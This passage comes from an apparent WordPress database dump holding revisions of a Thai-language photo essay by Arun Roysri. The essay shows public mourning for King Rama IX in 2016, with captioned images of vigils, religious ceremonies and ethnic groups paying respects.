บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-full\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-full\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-full\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-full\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-full\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-full\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-full\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-full\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"675\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-full\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-full\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-full\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-full\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-full\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-full\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-full\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-full\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ขณะเสด็จพระราชทานฝูงแกะในพื้นที่หมู่บ้านห้วยห้อมแก่ประชาชน และต่อมาพระองค์ได้ริเริ่มโครงการพระราชดําริ อันส่งผลให้ชาวบ้านห้วยห้อมมีชีวิตความเป็นอยู่ที่ดีขึ้น</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4335 size-full\" src=\"/wp-content/uploads/2018/11/73-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ในวันที่ 11 ธันวาคม พ.ศ. 2559 กลุ่มชาติพันธุ์ที่อาศัยอยู่ในจังหวัดทางภาคเหนือและภาคตะวันออกเฉียงเหนือ จํานวน 41 กลุ่ม พร้อมใจเดินทางมายังพระบรมมหาราชวัง เพื่อมาถวายสักการะพระบรมศพพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช เบื้องหน้าพระบรมโกศ ณ พระที่นั่งดุสิตมหาปราสาท พร้อมทั้งประกอบพิธีส่งดวงพระวิญญาณของในหลวงรัชกาลที่ 9 ตามแบบแผนประเพณีของแต่ละกลุ่มชาติพันธุ์ด้วย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ครั้งหนึ่งในชีวิต”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4336 size-full\" src=\"/wp-content/uploads/2018/11/74-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">หญิงชาวอิวเมี่ยน (เมี่ยน) ในชุดแต่งกายประจํากลุ่มชาติพันธุ์ที่โดดเด่นด้วยผ้าโพกศีรษะขนาดใหญ่สีดํากับลวดลายที่วิจิตรบรรจงตรงด้านบนศีรษะและไหมพรมสีแดงอ่อนที่พันอยู่รอบคอที่ดูตัดกับเสื้อผ้าสีดําอย่างโดดเด่นกําลังนั่งรอเข้ากราบพระบรมศพในหลวงรัชกาลที่ 9 ในบริเวณพระบรมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4337 size-full\" src=\"/wp-content/uploads/2018/11/76-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ด้วยความไร้เดียงสา\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4338 size-full\" src=\"/wp-content/uploads/2018/11/77-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เด็ก ๆ ตื่นเต้นกับการได้จุดเทียนและร้องเพลงสรรเสริญพระบารมี ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ บริเวณริมแม่นํ้าแม่กลอง จังหวัดราชบุรี</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ประสานเสียง”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4339 size-full\" src=\"/wp-content/uploads/2018/11/81-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1198\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">นักเรียนระดับอนุบาลร้องเพลงประสานเสียง “ลูกของพ่อ” และ “พระราชาในนิทาน” ในงานถวายความอาลัยแด่พระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช ณ สนามกีฬาไอโมบาย จังหวัดบุรีรัมย์</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ณ กําแพงบ้านพ่อ”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4340 size-full\" src=\"/wp-content/uploads/2018/11/91-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>', 'ภาพถ่าย โดย อรุณ ร้อยศรี', '', 'inherit', 'closed', 'closed', '', '4341-revision-v1', '', '', '2018-11-12 13:48:46', '2018-11-12 06:48:46', '', 4341, 'http://www.technicrayong.ac.th/4341-revision-v1/', 0, 'revision', '', 0),
(4369, 3, '2018-11-12 14:00:19', '2018-11-12 07:00:19', '<h3 style=\"text-align: center;\"><span class=\"fontstyle0\" style=\"color: #993300;\">“พิธีจุดเทียนถวายความอาลัยและสวดมนต์ข้ามปี ของชาวเมืองบุรีรัมย์”</span></h3>\r\n<img class=\"aligncenter wp-image-4313 size-large\" src=\"/wp-content/uploads/2018/11/2-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระภิกษุชาวเมืองบุรีรัมย์และจังหวัดใกล้เคียงร่วมกันทําพิธีสวดมนต์ข้ามปี เนื่องในวันสิ้นปี และถวายความอาลัยแด่ในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ภาพจากพลังความตั้งใจ”</span></h3>\r\n<img class=\"aligncenter wp-image-4314 size-large\" src=\"/wp-content/uploads/2018/11/3-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">การแสดงพลังของเหล่านักเรียนชั้นมัธยมศึกษาโรงเรียนอัสสัมชัญ เขตบางรัก กรุงเทพฯ ด้วยการแปรอักษรเป็นพระบรมฉายาลักษณ์ ทั้งหมด 11 ภาพ ที่มีทั้งความงดงาม ความพร้อมเพรียง และความทุ่มเท</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เพื่อประชาชนด้วยพระหัตถ์ของพระองค์เอง”</span></h3>\r\n<img class=\"aligncenter wp-image-4315 size-large\" src=\"/wp-content/uploads/2018/11/4-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" />\r\n<p style=\"text-align: center;\">พระเจ้าวรวงศ์เธอ พระองค์เจ้าโสมสวลี พระวรราชาทินัดดามาตุ ทรงประกอบอาหารด้วยพระองค์เอง เพื่อประทานแก่ประชาชนที่เข้ามากราบพระบรมศพในหลวงรัชกาลที่ 9 ณ บริเวณท้องสนามหลวง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“พิธีสวดมิสซา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4316 size-large\" src=\"/wp-content/uploads/2018/11/12-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">การสวดมิสซาในโบสถ์อัสสัมชัญบางรัก กรุงเทพฯ เพื่อแสดงการไว้อาลัยต่อการจากไปของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“การปฏิบัติงานของเจ้าหน้าที่”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4317 size-large\" src=\"/wp-content/uploads/2018/11/17-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เจ้าหน้าที่ตํารวจปฏิบัติหน้าที่บริเวณถนนหน้าพระลาน เพื่อจัดระเบียบและอํานวยความสะดวกแก่ประชาชนที่เข้ามาร่วมถวายสักการะพระบรมศพในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “แต่งดํา ทั้งเมือง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4318 size-large\" src=\"/wp-content/uploads/2018/11/21-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">บรรยากาศการไว้อาลัยแด่ในหลวงรัชกาลที่ 9 ณ สถานีรถไฟฟ้ า BTS สยาม</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ชาวมอญ”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4319 size-large\" src=\"/wp-content/uploads/2018/11/23-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนที่มาถวายความอาลัยในหลวงรัชกาลที่ 9 ณ พระบรมหาราชวัง มักแต่งกายด้วยเสื้อผ้าสีดําเป็นหลัก แต่มีพสกนิกรอีกจํานวนไม่น้อย โดยเฉพาะกลุ่มชาติพันธุ์ต่าง ๆ ที่เลือกใส่เสื้อผ้าอาภรณ์อันเป็นเอกลักษณ์ ของกลุ่มตนเองมาถวายความอาลัยแทนเสื้อผ้าสีดํา เช่น ชาวไทยเชื้อสายมอญจากอําเภอสังขละบุรี จังหวัดกาญจนบุรีที่มากราบสักการะพระบรมศพในหลวงรัชกาลที่ 9 ในชุดแต่งกายประจําถิ่น</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เก็บไว้ในความทรงจํา”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4320 size-large\" src=\"/wp-content/uploads/2018/11/24-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">นอกจากจุดเทียนและวางดอกไม้เพื่อแสดงความอาลัย ณ บริเวณกําแพงด้านหน้าพระบรมมหาราชวังแล้ว ประชาชนจํานวนมากยังได้ซื้อหาพระบรมสาทิสลักษณ์ และพระบรมฉายาลักษณ์ที่พ่อค้าแม่ค้าจํานวนมากมาจําหน่ายเพื่อเก็บไว้เป็นความทรงจํา</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4321 size-large\" src=\"/wp-content/uploads/2018/11/27-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึก จุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐานพระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ครอบครัวพาสมาชิกตัวน้อยมาร่วมวางดอกไม้ ณ ริมกํา แพงพระบรมมหาราชวัง\"</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4322 size-large\" src=\"/wp-content/uploads/2018/11/32-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">เพื่อแสดงความอาลัยต่อการเสด็จสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดช และร่วมเป็นส่วนหนึ่งในช่วงเวลาที่สําคัญที่สุดของคนไทยทั้งประเทศ</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4323 size-large\" src=\"/wp-content/uploads/2018/11/37-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\"> “ข้างกําแพงวัง”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4324 size-large\" src=\"/wp-content/uploads/2018/11/38-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ในวันที่พ่อจากไป...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4325 size-large\" src=\"/wp-content/uploads/2018/11/42-Arun-Roysri-copy-1024x682.jpg\" alt=\"\" width=\"640\" height=\"426\" /></p>\r\n<p style=\"text-align: center;\">ศูนย์การค้าแห่งหนึ่งจัดงานรําลึกและจุดเทียนถวายความอาลัยแด่ในหลวงรัชกาลที่ 9 ซึ่งในงานมีการแจกภาพในหลวงและลงนามถวายความอาลัย</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“กราบรําลึกถึงพระองค์”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4326 size-full\" src=\"/wp-content/uploads/2018/11/43-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"675\" /></p>\r\n<p style=\"text-align: center;\">ราว 2 ทุ่ม ของวันพฤหัสบดีที่ 27 ตุลาคม พ.ศ. 2559 ชาวโพธาราม จังหวัดราชบุรีและอําเภอใกล้เคียง ได้มารวมตัวกันจุดเทียนสีขาว ร้องเพลงสรรเสริญพระบารมี และกราบพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 ณ บริเวณหาดทรายโพธารามริมแม่นํ้าแม่กลอง ด้วยความอาลัยและรําลึกถึงพระมหากรุณาธิคุณของพระองค์</p>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4327 size-full\" src=\"/wp-content/uploads/2018/11/54-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เฝ้ารอ...”</span></h3>\r\n<p class=\"alignnone\"><img class=\"aligncenter wp-image-4328 size-full\" src=\"/wp-content/uploads/2018/11/55-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p style=\"text-align: center;\">ประชาชนตลอดสองฝั่งถนนรอรับขบวนเสด็จพระบรมวงศานุวงศ์ ที่เสด็จมาประกอบพิธีทางศาสนา เมื่อเสร็จพิธีเจ้าหน้าที่จะอนุญาตให้ประชาชน\r\nเข้าไปวางดอกไม้และจุดเทียนรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><span style=\"color: #993300;\">“เสียงประสานจากใจ”</span></h3>\r\n<p class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4329 size-full\" src=\"/wp-content/uploads/2018/11/57-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></p>\r\n<p class=\"alignnone\" style=\"text-align: center;\">ประชาชนที่ร่วมกันร้องเพลงสรรเสริญพระบารมีและจุดเทียนถวายความอาลัย บริเวณท้องสนามหลวงและรอบกําแพงพระบรมมหาราชวัง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">\"ในเวลากลางคืน บริเวณถนนรอบพระบรมมหาราชวัง\"</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4330 size-full\" src=\"/wp-content/uploads/2018/11/59-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">คลาคลํ่าไปด้วยผู้คนที่มาแสดงความอาลัยและถ่ายรูปเป็นที่ระลึกจุดหนึ่งที่เป็นที่นิยมในการถ่ายรูป คือ ด้านหน้าประตูวิมานเทเวศร์ ที่สามารถมองเห็นพระที่นั่งดุสิตมหาปราสาท ซึ่งเป็นที่ประดิษฐาน พระบรมศพของในหลวงรัชกาลที่ 9</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“เทียนและดอกไม้แห่งการรําลึก”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4331 size-full\" src=\"/wp-content/uploads/2018/11/62-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">ช่วงแรกหลังจากการสวรรคตของพระบาทสมเด็จพระปรมินทรมหาภูมิพลอดุลยเดชประชาชนจะนําเทียนและดอกไม้มากราบไหว้ เพื่อเป็นการแสดงความอาลัยต่อพระองค์ทุกคนต่างมาด้วยความรู้สึกโศกเศร้าเสียใจอย่างสุดซึ้ง</p>\r\n\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“สวดมนต์ ภาวนา”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4332 size-full\" src=\"/wp-content/uploads/2018/11/64-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">แม่ชีและนักศึกษาร่วมกันนั่งสวดมนต์ภาวนา เพื่อถวายเป็นพระราชกุศลแด่ในหลวงรัชกาลที่ 9 ณ ท้องสนามหลวง</p>\r\n\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4333 size-full\" src=\"/wp-content/uploads/2018/11/70-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<h3 style=\"text-align: center;\"><span style=\"color: #993300;\">“ตามรอยเส้นทางพระราชดําเนิน”</span></h3>\r\n<h3 class=\"alignnone\" style=\"text-align: center;\"><img class=\"aligncenter wp-image-4334 size-full\" src=\"/wp-content/uploads/2018/11/72-Arun-Roysri-copy.jpg\" alt=\"\" width=\"1200\" height=\"799\" /></h3>\r\n<p style=\"text-align: center;\">เจริญ นักรบไพร ชาวบ้านหมู่บ้านห้วยห้อม จังหวัดแม่ฮ่องสอน ถือพระบรมฉายาลักษณ์ของในหลวงรัชกาลที่ 9 